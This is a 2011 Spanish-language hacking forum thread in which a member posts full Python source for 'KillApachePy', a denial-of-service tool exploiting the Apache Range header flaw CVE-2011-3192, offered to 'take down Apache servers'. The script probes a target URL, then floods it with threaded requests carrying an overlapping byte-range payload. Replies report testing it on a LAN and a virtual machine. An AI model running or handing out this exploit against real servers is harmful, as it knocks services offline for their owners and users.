comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Python Apache Killer (Range Header DoS CVE-2011-3192)

  • 3 Respuestas
  • 2114 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« en: Noviembre 28, 2011, 08:52:09 pm »
Os dejo este code, que sirve para tirar servidores Apache (No todos)
Código: Python
  1. #!/usr/bin/env python
  2.  
  3. import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse
  4.  
  5. NAME = "KillApachePy (Range Header DoS CVE-2011-3192)"
  6. VERSION = "0.1d"
  7. AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
  8. LICENSE = "Public domain (FREE)"
  9.  
  10. SLEEP_TIME = 3 # time to wait for new thread slots (after max number reached)
  11. RANGE_NUMBER = 1024 # number of range subitems forming the DoS payload
  12. USER_AGENT = "KillApachePy (%s)" % VERSION
  13.  
  14. def attack(url, user_agent=None, method='GET', proxy=None):
  15.     url = ("http://%s" % url) if '://' not in url else url
  16.     host = urlparse.urlparse(url).netloc
  17.  
  18.     if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
  19.         print "(x) Invalid proxy address used"
  20.         exit(-1)
  21.  
  22.     proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
  23.     opener = urllib2.build_opener(proxy_support)
  24.     urllib2.install_opener(opener)
  25.  
  26.     class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
  27.         def set_method(self, method):
  28.             self.method = method.upper()
  29.  
  30.         def get_method(self):
  31.             return getattr(self, 'method', urllib2.Request.get_method(self))
  32.  
  33.     def _send(check=False): #Send the vulnerable request to the target
  34.         if check:
  35.             print "(i) Checking target for vulnerability..."
  36.         payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
  37.         try:
  38.             headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
  39.             req = _MethodRequest(url, None, headers)
  40.             req.set_method(method)
  41.             response = urllib2.urlopen(req)
  42.             if check:
  43.                 return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
  44.         except urllib2.URLError, msg:
  45.             if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
  46.                 pass
  47.             elif 'timed out' in str(msg):
  48.                 print "\r(i) Server seems to be choked ('%s')" % msg
  49.             else:
  50.                 print "(x) Connection error ('%s')" % msg
  51.                 if check or 'Forbidden' in str(msg):
  52.                     os._exit(-1)
  53.         except Exception, msg:
  54.             raise
  55.  
  56.     try:
  57.         if not _send(check=True):
  58.             print "(x) Target does not seem to be vulnerable"
  59.         else:
  60.             print "(o) Target seems to be vulnerable\n"
  61.             quit = False
  62.             while not quit:
  63.                 threads = []
  64.                 print "(i) Creating new threads..."
  65.                 try:
  66.                     while True:
  67.                         thread = threading.Thread(target=_send)
  68.                         thread.start()
  69.                         threads.append(thread)
  70.                 except KeyboardInterrupt:
  71.                     quit = True
  72.                     raise
  73.                 except Exception, msg:
  74.                     if 'new thread' in str(msg):
  75.                         print "(i) Maximum number of new threads created (%d)" % len(threads)
  76.                     else:
  77.                         print "(x) Exception occured ('%s')" % msg
  78.                 finally:
  79.                     if not quit:
  80.                         print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
  81.                         time.sleep(SLEEP_TIME)
  82.                         print
  83.     except KeyboardInterrupt:
  84.         print "\r(x) Ctrl-C was pressed"
  85.         os._exit(1)
  86.  
  87. if __name__ == "__main__":
  88.     print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
  89.     parser = optparse.OptionParser(version=VERSION)
  90.     parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
  91.     parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
  92.     parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
  93.     parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
  94.     options, _ = parser.parse_args()
  95.     if options.url:
  96.         result = attack(options.url, options.agent, options.method, options.proxy)
  97.     else:
  98.         parser.print_help()

Un saludo.
« Última modificación: Mayo 03, 2014, 03:58:03 am por Flemon »
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado JaAViEr

  • *
  • Underc0der
  • Mensajes: 163
  • Actividad:
    0%
  • Reputación 0
  • http://codigo.ga
    • Ver Perfil
    • Blog de Programación :: Python
« Respuesta #1 en: Diciembre 04, 2011, 06:48:02 pm »
Testeado al 100% :O ?
A Probar !

Saludos.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking
« Respuesta #2 en: Diciembre 04, 2011, 08:36:40 pm »
mmm Al parecer creo que no funciona, lo probe en diferentes versiones del apache en mi red LAN
salu2




"Mess with the best, die like the rest"

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #3 en: Diciembre 05, 2011, 11:53:47 am »
A mi me funcionó, lo probe en la VM, hay que tener en cuenta que no todas las versiones de apache son vulnerables.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



[Código] Yardas a metros - Metros a yardas [Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1419
Último mensaje Mayo 29, 2011, 01:27:34 am
por LucaSthefano
Python keylogger - by "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 0
Vistas: 2059
Último mensaje Abril 07, 2010, 03:30:22 am
por d33k40
Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2548
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
[Código] Entero / No Entero [Ejercicio - Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1387
Último mensaje Mayo 29, 2011, 01:24:09 am
por LucaSthefano
Python Trojan - By "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 1
Vistas: 2109
Último mensaje Abril 03, 2010, 11:01:59 pm
por Dharok